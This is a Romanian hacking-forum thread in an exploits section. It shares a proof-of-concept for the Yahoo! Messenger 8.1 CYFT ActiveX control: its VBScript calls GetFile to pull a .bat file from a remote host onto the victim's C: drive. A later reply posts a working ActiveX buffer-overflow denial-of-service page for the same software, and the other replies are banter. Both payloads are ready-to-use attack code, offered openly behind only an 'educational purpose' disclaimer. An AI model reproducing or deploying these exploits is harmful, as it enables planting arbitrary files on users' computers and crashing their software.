Jump to content
nullbyte

Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Downlo

By nullbyte, in Exploituri

Recommended Posts

nullbyte Newbie

nullbyte

Posted
Posted 

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
[b]Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download[/b]
url: [url]http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe[/url]

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]

[b]<font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font>[/b]

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

[b]Marked as:
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False[/b]

From remote: depends by Internet Explorer settings
From local: yes

[b]Description:
This contron contains a "GetFile()" method which allows to download, on
user's pc, an arbitrary file pased as argument.
Remote execution depends by Internet Explorer settings, local execution
works very well.[/b]

[b]greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration[/b]
-----------------------------------------------------------------------------
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai"
MsgBox "Exploit completed"
End Sub
</script>
</span></span>
</code></pre>

Link to comment
Share on other sites
Guest BanKai

Guest BanKai

Posted
Posted
pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citeste

download pt victima

upload pentru atacator

si cum noi suntem atacatorii evident ca va fi numit upload

as apercia sa nu mai flamezi pe forum sau vei fi banat

Link to comment
Share on other sites
dynasty Newbie

dynasty

Posted
Posted
pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citeste

Ce exemplu prost ai dat. In cazu' asta nu stiu cat de multe are in comun getfile() cu wget.

Link to comment
Share on other sites
hirosima Newbie

hirosima

Posted
Posted

va las si eu un DOS tot pentru yahoo messenger 8.1:

Yahoo Messenger 8.1 (latest) Remote DoS

Safe for Scripting, Safe for Initialize

<html><body>

<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object>

<script language=vbscript>

arg1=String(517140, "A")

target.c arg1

</script>

</body></html>

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...